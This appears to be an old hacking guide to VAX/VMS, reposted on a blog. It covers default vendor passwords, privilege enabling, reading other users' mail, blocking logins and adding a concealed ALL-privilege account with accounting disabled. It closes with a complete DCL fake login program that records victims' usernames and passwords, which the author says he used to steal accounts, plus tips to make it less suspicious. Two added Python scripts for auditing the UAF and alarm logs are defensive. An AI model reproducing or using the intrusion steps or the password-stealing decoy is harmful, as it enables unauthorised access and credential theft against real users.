Hacking VAX/VMS + The User Authorisation File

Published in Elektrix · 1 year ago

INTRODUCTION

The VAX is made by DEC (Digital Equipment Corporation) and can run a variety of operating systems. In this file I will talk about VMS (Virtual Memory System). VMS runs on the VAX, a 32-bit minicomputer with a 32-bit virtual address space; it does not run on the older 16-bit PDP-11, which is a different architecture with its own operating systems.

ENTRANCE:

When you first connect to a VAX, type a return, a ctrl-c or a ctrl-y. It will respond with something similar to this:

USERNAME: 
PASSWORD:

The most frequent way of gaining access to a computer is by using a 'default' password. This, by the way, is not very successful. When DEC sells a VAX/VMS, the system comes equipped with four accounts:

  • DEFAULT: Serves as a template for creating user records in the UAF (User Authorization File). A new user record is assigned the values of the DEFAULT record except where the system manager changes them. The DEFAULT record can be modified but cannot be deleted from the UAF.
  • SYSTEM: Provides a means for the system manager to log in with full privileges. The SYSTEM record can be modified but cannot be deleted from the UAF.
  • FIELD: Permits DIGITAL field service personnel to check out a new system. The FIELD record can be deleted once the system is installed.
  • SYSTEST: Provides an appropriate environment for running the User Environment Test Package (UETP). The SYSTEST record can be deleted once the system is installed.

Usually the system manager adds, deletes and modifies these records in the UAF when the system arrives, thus eliminating the default passwords, but this is not always the case. Some default passwords which have been used to get into a system are:

 USERNAME     PASSWORD
 --------     -------------------
 SYSTEM       MANAGER or OPERATOR
 FIELD        SERVICE or TEST
 DEFAULT      USER or DEFAULT
 SYSTEST      UETP or SYSTEST

Other typical VMS accounts are :

  • VAX
  • VMS
  • DCL
  • DEMO
  • GUEST
  • GENERAL
  • TEST
  • HELP
  • GAMES
  • DECNET

Or a combination of the various usernames and passwords. If none of these get you in, then you should try another system, unless you have a way of getting an account either by trashing or other means.

YOU'RE IN!

You will know that you are in by receiving the prompt of a dollar sign ($). You will be popped into the default directory, which depends on what account you logged in as. If you get in as system manager (highly unlikely) you have full access.

If you get the FIELD or SYSTEST account, you may or may not have full access, but you may have the privileges to give yourself full access.

To give privs to yourself:

$ SET PROCESS/PRIVS=ALL

Note what this actually does: it only switches on privileges that the account's UAF record already authorizes (or, if the process holds SETPRV, any privilege). It cannot hand you a privilege the account was never authorized for. It works on FIELD and SYSTEST because those records historically shipped with a full set of authorized privileges; SHOW PROCESS/PRIVILEGES tells you which ones you really hold afterwards.

The VMS system has full help files available by typing HELP. You can use the wildcard character of an '*' to list out info on every command:

$ help *

When you first logon, it may be to your advantage to get a list of all users currently logged onto the system if there are any at all. You can do this by:

$ SHOW USERS

      VAX/VMS Interactive Users - Total = 4
      01-MAY-1989 11:37:21.73
      OPA0:   DEMO        004C004C
      TTD2:   FIELD       004E02FF
      TTD1:   SYSMAN      0043552E
      TXB3:   TRTRTRRTR   01190057

It is highly recommended that if you are logged on during the day and there are people logged in, especially the system manager, or if the account you are logged on as appears twice, you log out straight away and call back later. You do not want to call too late either, though, as the system keeps a record of when each user logs in and out.

To communicate with other users or other hackers that are on the system, use the PHONE utility..

$ PHONE Username

If the system has DECnet you can see what nodes are available by:

$ SHOW NETWORK

If you have mail the system will tell you as soon as you logon, simply type:

$ MAIL

This will invoke the Personal Mail Utility, you can then either read your mail or select help....

DIRECTORIES:

To see what you have in your directory type:

$ DIR

To list every file in the current directory type:

$ DIR *.*

Subdirectories are themselves files of type .DIR, so DIR *.DIR shows just those. When a VAX/VMS system is first installed, it comes with a set of system directories. They do not show up when you execute DIR *.* from a user directory because they live under the system root (SYS$SYSROOT:), not under your default directory; DIR SYS$SYSROOT:[000000]*.DIR lists them. They are:

<SYSLIB>

This directory contains various macro and object libraries.

<SYSMSG>

This directory contains the system message files.

<SYSMGR>

This directory contains the command procedures used in managing the operating system (startup, shutdown, site-specific procedures) and the operator log. (The help libraries for the HELP command are not here but in <SYSHLP>.)

<SYSERR>

This is the directory for the error log file (ERRLOG.SYS).

<SYSTEST>

This directory contains files used in testing the functions of the operating system.

<SYSMAINT>

This directory contains system diagnostic programs.

<SYSUPD>

This directory contains files used in applying system updates.

<SYSUPD.EXAMPLES>

This directory contains sample driver programs, user-written system services, and other source programs.

<SYSEXE>

This directory contains the executable images of most of the functions of the operating system, including AUTHORIZE, SYSGEN and LOGINOUT.

Inside these directories are files with the following file types:

File type   Description               How to use it
---------   ------------------------  ------------------------
.HLP        system help file          TYPE filename
.DAT        data file                 TYPE filename
.MSG        message file              TYPE filename
.DOC        documentation             TYPE filename
.LOG        log file                  TYPE filename
.ERR        error message file        TYPE filename
.SEQ        sequential file           TYPE filename
.SYS        system file               not run directly
.EXE        executable image          RUN filename
.COM        DCL command procedure     @filename
.BAS        BASIC source file         compile and link, then RUN
.TXT        ASCII text file           TYPE filename
--------------------------------------------------------------------

There are others, but you won't see them as often as the above. You change directory with the SET DEFAULT command (CHANGE is not a standard DCL verb; where it works it is a locally defined symbol):

$ SET DEFAULT <DIR.NAM>

You can now list and execute the files in this directory without prefixing the directory name to the filename, as long as you have sufficient access. You can still view files in directories that you cannot SET DEFAULT to by giving the full file specification:

$ TYPE <LOD.DIR>LOD.MAI;1

This lists the contents of the file LOD.MAI;1 in the directory <LOD.DIR>.

Wildcards are very helpful when you want to view all the mail or something similar on the system. To list out all the users' mail, if you have access, type:

$ TYPE <*.*>*.MAI;*

As you may have noticed, mail files have the file type .MAI. The ;1, ;2 etc. are version numbers: VMS keeps several versions of a file with the same name and type, and the highest version number is the current one.

PRIVILEGES

Privileges fall into seven categories according to the damage that a user possessing them could cause to the system (this category is what the Privs column of a brief AUTHORIZE listing shows):

  • NONE - No privileges
  • NORMAL - minimum privileges to use the system.
  • GROUP - Potential to interfere with members of the same group.
  • DEVOUR - Potential to devour noncritical system-wide resources.
  • SYSTEM - Potential to interfere with normal system operation.
  • FILE - Potential to compromise file security.
  • ALL - Potential to control the system (wouldn't that be good ahah).

THE UAF

The User Authorization File (SYS$SYSTEM:SYSUAF.DAT) contains the names of the users who may log into the system and a record of each user's privileges. Each record in the UAF includes the following:

  1. Username and password (the password is stored as a one-way hash, not in clear).
  2. User Identification Code (UIC): identifies a user by a group number and a member number.
  3. Default file specification: the default device and directory names for file access.
  4. Login command file: names a command procedure to be executed automatically at login time.
  5. Login flags: allow the system manager to inhibit the use of ctrl-y, lock user passwords, disable the account (DISUSER) and so on.
  6. Priority: the base priority of the process created for the user at login time.
  7. Resources: limits on the system resources (quotas) the user may consume.
  8. Privileges: limits on the activities the user may perform.

If you have system manager privileges (SYSPRV, or otherwise write access to SYSUAF.DAT), you will be able to add, delete and modify records in the UAF.

The AUTHORIZE utility is what you use to modify the information in the UAF. It lives in SYS$SYSTEM (the <SYSEXE> directory) as AUTHORIZE.EXE.

The commands for AUTHORIZE are:

  • ADD username [/qualifiers...]: adds a record to the UAF.
  • EXIT (or CTRL-Z): returns you to DCL.
  • HELP: lists the AUTHORIZE commands.
  • LIST [userspec] [/FULL]: creates a listing file (SYSUAF.LIS) of UAF records.
  • MODIFY username [/qualifiers...]: modifies a record.
  • REMOVE username: deletes a record.
  • SHOW [userspec] [/BRIEF | /FULL]: displays UAF records on the terminal.

The most useful besides ADD is the SHOW command. SHOW displays reports for selected UAF records; you can get a /BRIEF listing or a /FULL listing. But before you do that, you may want to make sure no one is logged on besides you. To make sure no one else can log on, type:

$ SET LOGINS /INTERACTIVE=0

This sets the maximum number of interactive users able to log in to the system. It does not affect users currently logged on, and it is a very visible change (SHOW LOGINS reports it), so do not forget to put it back.

To list out the user file do the following:

$ SET  DEFAULT <SYSEXE> 
$ RUN AUTHORIZE
UAF> SHOW * /BRIEF

Unfortunately you cannot get a listing of passwords, though you can get a listing of all the users as shown above. The passwords are not stored in a recoverable form: SYSUAF.DAT holds a salted one-way hash of each password (a Purdy polynomial), much as a Unix system holds a one-way hash in its password file, so even a full dump of the file gives you hashes, not passwords.

If you have sufficient privs you can create your own account:

UAF> ADD <username> /PASSWORD=HACKER /UIC=<014,006> /CPUTIME=0 /DEVICE=SYS$SYSROOT /ACCOUNT=VMS /DIRECTORY=<SYSERR> /PRIVS=ALL /OWNER=DIGITAL /NOACCOUNTING

  1. ADD username: the username of the new record.
  2. /PASSWORD: the password you want to use.
  3. /UIC: the UIC consists of two octal numbers (group, member) separated by a comma and enclosed in brackets.
  4. /CPUTIME is in delta-time format; 0 means unlimited.
  5. /DEVICE: the device that becomes the default when the user logs in. Other devices are SYS$DEVICE, SYS$SYSDISK etc.
  6. /ACCOUNT: specifying an account name is not really necessary.
  7. /PRIVS: you are going to want all the privs, aren't you? This sets the privileges the account is authorized to hold.
  8. /NOACCOUNTING (very important): disables accounting for this user, so its sessions add no records to ACCOUNTING.DAT.

None of this hides the record itself: the new entry appears in any UAF listing with an owner of DIGITAL, a default directory under the system root and ALL privileges, and the ADD is an AUTHORIZATION event if security alarms are enabled.
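
The ADD above leaves fingerprints a system manager can look for, and the brief AUTHORIZE listing is enough to find them. The following Python script is an added example, not code from the article: it parses a brief listing of the shape produced by LIST or SHOW/BRIEF (the column layout is approximated and the rows are constructed, including the back-door record the ADD command creates) and flags non-SYSTEM accounts holding the ALL privilege category, accounts in a system UIC group, accounts whose default directory sits inside the system root, and the vendor installation accounts. The MAXSYSGROUP value and the assumption that only SYSTEM should hold ALL are stated as assumptions at the top.

```python
# Added example (not from the article): audit a brief AUTHORIZE listing for the
# kind of record the ADD command above creates. Column layout approximates the
# brief LIST / SHOW/BRIEF report; the rows below are constructed for this example.
import re
from dataclasses import dataclass

SAMPLE_BRIEF_LISTING = """\
Owner                  Username   UIC        Account  Privs   Pri  Directory
SYSTEM MANAGER         SYSTEM     [001,004]  SYSTEM   All     4    SYS$SYSROOT:[SYSMGR]
FIELD SERVICE          FIELD      [001,010]  FIELD    All     4    SYS$SYSROOT:[SYSMAINT]
DIGITAL                HACKER     [014,006]  VMS      All     4    SYS$SYSROOT:[SYSERR]
J SMITH                JSMITH     [200,021]  STUDENT  Normal  4    DISK$USER:[JSMITH]
DEMO USER              DEMO       [200,001]           Normal  4    DISK$USER:[DEMO]
"""

# Assumptions, adjust per site: MAXSYSGROUP left at its default of 10 (octal),
# so UIC groups up to [10,*] are "system" UICs; only SYSTEM is expected to hold
# the ALL privilege category.
MAXSYSGROUP = 0o10
TRUSTED_ALL_PRIVS = {"SYSTEM"}
VENDOR_ACCOUNTS = {"FIELD", "SYSTEST", "DEFAULT"}   # installation accounts named in the article
UIC_RE = re.compile(r"\[([0-7]+),([0-7]+)\]")


@dataclass
class UafRecord:
    owner: str
    username: str
    group: int        # octal UIC group number, stored as an int
    member: int
    account: str
    privs: str        # privilege category shown in the brief listing: All, Normal, Devour, ...
    priority: int
    directory: str


def parse_brief_listing(text):
    """Split each data row around its [group,member] UIC; header lines and %UAF messages have none."""
    records = []
    for line in text.splitlines():
        m = UIC_RE.search(line)
        if not m:
            continue
        left, right = line[:m.start()].split(), line[m.end():].split()
        if not left or len(right) < 3:
            continue
        privs, pri, directory = right[-3:]
        account = " ".join(right[:-3])        # empty when the Account column is blank
        records.append(UafRecord(owner=" ".join(left[:-1]), username=left[-1],
                                 group=int(m.group(1), 8), member=int(m.group(2), 8),
                                 account=account, privs=privs, priority=int(pri),
                                 directory=directory))
    return records


def audit_uaf(records):
    """Return {username: [reasons]} for records a system manager should look at."""
    findings = {}
    for r in records:
        trusted = r.username in TRUSTED_ALL_PRIVS
        reasons = []
        if r.privs.upper() == "ALL" and not trusted:
            reasons.append("privilege category ALL on an account other than SYSTEM")
        if r.group <= MAXSYSGROUP and not trusted:
            reasons.append("system-group UIC [%o,%o]" % (r.group, r.member))
        if r.directory.upper().startswith("SYS$SYSROOT:") and not trusted:
            reasons.append("default directory inside the system root (%s)" % r.directory)
        if r.username in VENDOR_ACCOUNTS:
            reasons.append("vendor installation account: remove it or MODIFY /FLAGS=DISUSER")
        if reasons:
            findings[r.username] = reasons
    return findings


if __name__ == "__main__":
    for user, reasons in audit_uaf(parse_brief_listing(SAMPLE_BRIEF_LISTING)).items():
        print(user)
        for reason in reasons:
            print("    " + reason)
```

Run against the sample it reports FIELD (ALL privileges, system group, system-root directory, vendor account) and HACKER (ALL privileges and a home in <SYSERR>), and nothing for the ordinary users. Feed it a real SYSUAF.LIS and the interesting question is every account that is not SYSTEM and still shows All in the Privs column.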

LOGGING OFF
Simply type:

    $ LOGOUT

BYPASSING THE UAF

The documented way into a system whose UAF is locked (the SYSTEM password has been lost, or the file is corrupt) is to set the alternate UAF. This requires setting the system parameter UAFALTERNATE, which makes the logical name SYSUAF refer to the file SYS$SYSTEM:SYSUAFALT.DAT. If that file exists, a normal login uses it to validate the account and prompts you for the username and password as usual. If the file is not found, the system assumes the UAF is unusable and accepts any username and password to log you in from the system console. Logins are prohibited from all other locations.

NOTE: You can only use this method to log into the system from the console terminal; you cannot use the other terminal lines. It also needs a conversational boot, so it means hands on the console. That is also the defender's check: a physically protected console, and a SYSUAFALT.DAT that exists, so that setting UAFALTERNATE still demands a valid password.

To set the alternate UAF, use the following procedure:

1: Perform a conversational boot.
2: When the SYSBOOT > prompt appears, enter the following:

       SYSBOOT > SET UAFALTERNATE 1 <cr>

3: Type CONTINUE and press <cr>.
4: When the startup procedure completes, log in on the console terminal, entering any username and password when asked.

The system assigns the following values to your user account:

  NAME.................. Username.
  UIC................... [001,004].
  COMMAND INTERPRETER... DCL.
  LOGIN FLAGS........... None.
  PRIORITY.............. Value of the system parameter DEFPRI.
  RESOURCES............. Values of the PQL system parameters.
  PRIVILEGES............ ALL.

The process name is usually the name of the device on which you logged in EG opa0..

5: Fix the problem that caused you to be locked out of the system. That is, make the necessary repairs to the UAF or to the startup or login procedures. (If you modify a login or startup procedure and the problem is still not solved, restore the procedure to its previous state.)

If the problem is a forgotten password, reset the UAFALTERNATE system parameter to 0, as explained in the next step. Then enter the AUTHORIZE utility and type HELP MODIFY for information on modifying passwords.

6: Clear the UAFALTERNATE parameter by running SYSGEN and using SYSGEN commands. To run SYSGEN, enter the following commands at the DCL prompt:

     $ RUN SYS$SYSTEM:SYSGEN <CR>

The SYSGEN prompt is then displayed; enter the following commands:

     SYSGEN > SET UAFALTERNATE 0 <CR>
     SYSGEN > WRITE CURRENT <CR>
     SYSGEN > EXIT <CR>

7: Shutdown and reboot the system.

Emergency startup after modifying system parameters.

In some cases, modifying system parameters may cause the system to become unbootable. If this occurs, use the following emergency startup procedure to restore normal operation.

1: Perform a conversational boot.
2: When the SYSBOOT > prompt appears, enter the following commands:

     SYSBOOT > USE DEFAULT.PAR <CR>
     SYSBOOT > CONTINUE <CR>

3: When the system finishes booting, review any changes you made to SYSGEN parameters, modify MODPARAMS.DAT as necessary and re-execute AUTOGEN.

BYPASSING STARTUP AND LOGIN

If the system does not complete the startup procedures or does not allow you to log in, bypass the startup and login procedures by following these steps:

1: Perform a conversational boot..
2: define the console to be the startup procedure by entering the following commands at the SYSBOOT > prompt:

     SYSBOOT > SET/STARTUP OPA0:

Type continue and press <CR> in response to the next SYSBOOT > prompt.
Wait for the DCL prompt to return.....

3: Correct the error condition that caused the login failure. That is, make the necessary repairs to the startup or login procedures, or to the UAF. You may want to enter the following DCL commands because bypassing the startup procedures leaves the system in a partially initialized state:

     $ SET NOON <CR>
     $ SET DEFAULT SYS$SYSROOT:[SYSEXE] <CR>

Invoke a text editor to correct the startup or login procedure file. Note that some system consoles may not supply a screen mode editor.

4: Reset the startup procedure by invoking SYSGEN and entering the following commands:

     $ RUN SYS$SYSTEM:SYSGEN <CR>
     SYSGEN > SET/STARTUP SYS$SYSTEM:STARTUP.COM <CR>
     SYSGEN > WRITE CURRENT <CR>
     SYSGEN > EXIT <CR>

5: Perform a normal startup by entering the following command:

     $ @SYS$SYSTEM:STARTUP <CR>

To perform an orderly shutdown of the system, invoke SHUTDOWN.COM from any terminal and any privileged account with the following DCL command:

     $ @SYS$SYSTEM:SHUTDOWN <CR>

EMERGENCY SHUTDOWN WITH OPCRASH

This describes how to halt the system immediately without performing any of the functions that ensure an orderly shutdown. Use OPCRASH only if SHUTDOWN.COM fails.

To perform this procedure you must have CMKRNL privilege. You can enter the command from any terminal.

1: Enter the following command to force an immediate crash of the system:

      $ RUN SYS$SYSTEM:OPCRASH <CR>

2: The system console then displays: SYSTEM SHUTDOWN COMPLETE - USE CONSOLE TO HALT SYSTEM.

3: Halt the system from the console.

GENERAL MAINTENANCE OF THE UAF

To disable an account use the following command:

   UAF > MODIFY  USERNAME/FLAGS=DISUSER <CR>

The login flag disuser disables the account and prevents anyone from logging into the account.

To enable the account when it is needed, run AUTHORIZE and specify the following command:

   UAF > MODIFY USERNAME/FLAGS=NODISUSER <CR>

MODIFYING A USER ACCOUNT

Use the AUTHORIZE command MODIFY to change any of the fields in an existing user account. The following command is used to change a users password.

   UAF> MODIFY USERNAME/PASSWORD=NEWPASSWORD <CR>

LISTING USER ACCOUNTS

Use the AUTHORIZE command LIST to create the file SYSUAF.LIS containing a summary of all user records in the UAF, as follows:

   UAF > LIST <CR> 

%UAF-I-LSTMSG1, WRITING LISTING FILE
%UAF-I-LSTMSG2, LISTING FILE SYSUAF.LIS COMPLETE.

By default the LIST command produces a brief report containing the following info from the UAF:

ACCOUNT OWNER, USERNAME, UIC, ACCOUNTNAMES, PRIVILEGES, PROCESS PRIORITY, DEFAULT DISK AND DIRECTORY.

Use the /FULL qualifier to create a full report of all the info contained within the UAF.....

ENABLING SECURITY ALARMS

To enable security auditing, use the DCL command SET AUDIT in the following format:

   $ SET AUDIT/ALARM/ENABLE=(keyword[,...])

Select the events to be audited by specifying one or more of these keywords to the /ENABLE qualifier:

  • ACL.......... Events requested by an ACL on a file or global section.
  • ALL.......... All possible events.
  • AUDIT........ Execution of the SET AUDIT command itself (so an intruder turning the alarms off is itself logged).
  • AUTHORIZATION Modifications to the system UAF, the network proxy file, the rights database, or changes to system and user passwords (this is the one that records an AUTHORIZE ADD or MODIFY).
  • BREAKIN...... Break-in attempts detected by the login break-in evasion mechanism (repeated failures from one source).
  • FILE_ACCESS.. Selected types of access (privileged and non-privileged) to files and global sections.
  • INSTALL...... Installation of images.
  • LOGFAILURE... Failed login attempts.
  • LOGIN........ Successful logins.
  • MOUNT........ Volume mounts and dismounts.

ENABLING ALARM MESSAGES

After you enable a security operator terminal, enable specific alarm events with the SET AUDIT/ENABLE qualifier. Alarm messages are then sent to the security operator terminal when the selected events occur.

AUDIT REDUCTION FACILITY

If you have enabled security alarms, the operating system writes the information about these alarms to the operator's log file. To extract all of the security alarm information from the current operator log (SYS$MANAGER:OPERATOR.LOG), execute this command:

   $ @SYS$MANAGER:SECAUDIT <CR>

Output from SECAUDIT is displayed on SYS$OUTPUT. If you want to write the records to a file, include the file specification with the /OUTPUT qualifier. The following command writes the records to the file BREAKINS.DAT in the user's current directory:

   $ @SYS$MANAGER:SECAUDIT/OUTPUT=BREAKINS.DAT
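
SECAUDIT only pulls the raw alarm records out of the log. The following Python script, added here as an example and not part of the article or of VMS, does the reduction step: it groups the records by username and reports bursts of login failures, break-in detections, and failures against the vendor default accounts from the start of this file. The alarm record layout is an approximation of the OPCOM security alarm text; the six records are constructed and reuse the usernames from the SHOW USERS listing above.

```python
# Added example (not from the article or VMS): reduce security alarm records
# from OPERATOR.LOG to a per-user summary. The record layout is an approximation
# of the OPCOM alarm text; the six records below are constructed.
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: three failures against FIELD in under two minutes, one
# against JSMITH, a break-in detection on DEMO and one ordinary SYSTEM login.
SAMPLE_OPERATOR_LOG = """\
%%%%%%%%%%%  OPCOM   1-MAY-1989 11:37:21.73  %%%%%%%%%%%
Security alarm (SECURITY) on VAXA, system id: 1025
Auditable event:          Login failure
Event time:                1-MAY-1989 11:37:21.73
Username:                 FIELD
Terminal name:            TTD2:
Status:                   %LOGIN-F-INVPWD, invalid password
%%%%%%%%%%%  OPCOM   1-MAY-1989 11:38:02.10  %%%%%%%%%%%
Auditable event:          Login failure
Event time:                1-MAY-1989 11:38:02.10
Username:                 FIELD
Terminal name:            TTD2:
%%%%%%%%%%%  OPCOM   1-MAY-1989 11:38:40.55  %%%%%%%%%%%
Auditable event:          Login failure
Event time:                1-MAY-1989 11:38:40.55
Username:                 FIELD
Terminal name:            TTD2:
%%%%%%%%%%%  OPCOM   1-MAY-1989 11:40:00.00  %%%%%%%%%%%
Auditable event:          Login failure
Event time:                1-MAY-1989 11:40:00.00
Username:                 JSMITH
Terminal name:            TTD1:
%%%%%%%%%%%  OPCOM   1-MAY-1989 12:01:15.30  %%%%%%%%%%%
Auditable event:          Breakin detection
Event time:                1-MAY-1989 12:01:15.30
Username:                 DEMO
Terminal name:            TXB3:
%%%%%%%%%%%  OPCOM   1-MAY-1989 12:05:44.00  %%%%%%%%%%%
Auditable event:          Local interactive login
Event time:                1-MAY-1989 12:05:44.00
Username:                 SYSTEM
Terminal name:            OPA0:
"""

VENDOR_ACCOUNTS = {"SYSTEM", "FIELD", "SYSTEST", "DEFAULT"}   # default accounts from the article


def parse_operator_log(text):
    """Each '%%%%%' OPCOM banner starts a record; 'Key: value' lines fill it in."""
    records, current = [], None
    for line in text.splitlines():
        if line.startswith("%%%%%"):
            current = {}
            records.append(current)
        elif current is not None and ":" in line:
            key, _, value = line.partition(":")
            current[key.strip().lower()] = value.strip()
    return [r for r in records if "auditable event" in r]


def event_time(record):
    # VMS absolute time, e.g. 1-MAY-1989 11:37:21.73 (hundredths of a second)
    return datetime.strptime(record["event time"], "%d-%b-%Y %H:%M:%S.%f")


def summarize(records, threshold=3, window=timedelta(minutes=5)):
    """Return {username: [findings]}: failure bursts, break-ins, guessing at vendor accounts."""
    failures, findings = defaultdict(list), defaultdict(list)
    for rec in records:
        event = rec["auditable event"].lower().replace("-", "")
        user = rec.get("username", "<none>")
        if event.startswith("login failure"):
            failures[user].append(event_time(rec))
        elif event.startswith("breakin"):
            findings[user].append("break-in detection on %s at %s"
                                  % (rec.get("terminal name", "?"), rec["event time"]))
    for user, times in failures.items():
        times.sort()
        # sliding window: any `threshold` consecutive failures inside `window`
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] <= window:
                findings[user].append("%d login failures within %s starting %s"
                                      % (threshold, window, times[i].strftime("%d-%b-%Y %H:%M:%S")))
                break
        if user in VENDOR_ACCOUNTS:
            findings[user].append("login failures against a vendor default account")
    return dict(findings)


if __name__ == "__main__":
    for user, items in summarize(parse_operator_log(SAMPLE_OPERATOR_LOG)).items():
        print(user)
        for item in items:
            print("    " + item)
```

On the sample it reports FIELD (three failures in 79 seconds, and a vendor account being guessed at) and DEMO (the break-in evasion mechanism fired); the single JSMITH failure and the SYSTEM login are noise and are left out. The threshold and window are arguments, since what counts as a burst depends on how many terminal lines the site has.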

SIMPLE DECOY PROGRAM

This is a decoy program that runs on the VAX/VMS system. It does work because I have used it at the local college of FE to steal passwords and accounts whilst working there.

The program now follows:

$! Decoy login banner in DCL. "clear" is assumed to be a user symbol that
$! clears the screen (e.g. CLEAR == "TYPE/PAGE NL:"); see the notes below.
$ clear
$ set term/noecho/notype
$! Node name shown in the banner; hard-code a string here if the real one is wrong
$ SYSNAM = f$getsyi("NODENAME")
$begin:
$! Wait for the victim to press return (a read error also restarts here)
$ read/error=begin/prompt="" sys$command ret
$ write sys$output ""
$ID:
$ wait 00:00:00.5
$ write sys$output "*** ''SYSNAM' VAX/VMS SYSTEM ***"
$ write sys$output ""
$ write sys$output ""
$ wait 00:00:01
$ set term/echo
$askquest:
$! Like LOGINOUT: the username is echoed and the prompt times out after 20 seconds
$ read/error=fail/end=eof/prompt="USERNAME: "/time_out=20 sys$command quest
$! Typing SYBIL as the username redraws the banner with SYBIL as the node name
$ if f$edit(quest,"upcase") .eqs. "SYBIL" then SYSNAM:=SYBIL
$ if f$edit(quest,"upcase") .eqs. "SYBIL" then goto ID
$ if quest .nes. "" then goto askpass
$eof:
$ write sys$output "Error reading command input"
$ write sys$output "End of file detected"
$ goto begin
$fail:
$ write sys$output "Error reading command input"
$ write sys$output "Timeout period expired"
$ goto begin
$askpass:
$! The password is read with echo off, as the real prompt does it
$ set term/noecho
$ read/error=eof/end=eof/prompt="PASSWORD: " sys$command pass
$ set term/echo
$! Record username, password and time. OPEN/WRITE creates a new version of
$! DATA.DAT on every capture, so earlier captures survive as older versions.
$ open/write file data.dat
$ write file quest
$ write file pass
$ write file f$time()
$ close file
$ set term/lowercase
$ write sys$output "User authorization failure"
$ read/error=begin/prompt="" sys$command ret
$! Kill our own process so the terminal drops back to a real login prompt
$ stop/id='f$getjpi("","PID")'

Notes about use:

  1. Change the welcoming message of the program to what is actually seen on your VAX.
  2. Why not put someone else's logout text at the top of the program, because a blank screen looks a bit suspicious: just copy the logout message and put it in a write sys$output command in the program, not forgetting to take the clear command out.
